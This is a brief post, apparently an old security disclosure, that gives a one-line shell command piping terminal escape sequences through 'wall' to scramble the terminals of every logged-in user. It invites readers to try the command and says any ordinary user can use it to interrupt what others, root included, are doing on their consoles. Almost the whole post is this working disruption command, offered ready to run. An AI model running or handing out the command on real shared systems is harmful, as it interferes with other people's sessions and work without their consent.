Try this on your command line: it screwes up
all tty's and pty's of all users:
echo -e "\033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h"|wall
Very unpleasant because someone with user access can
temporarily interrupt anything others (including root)
are doing on their consoles/xterms.
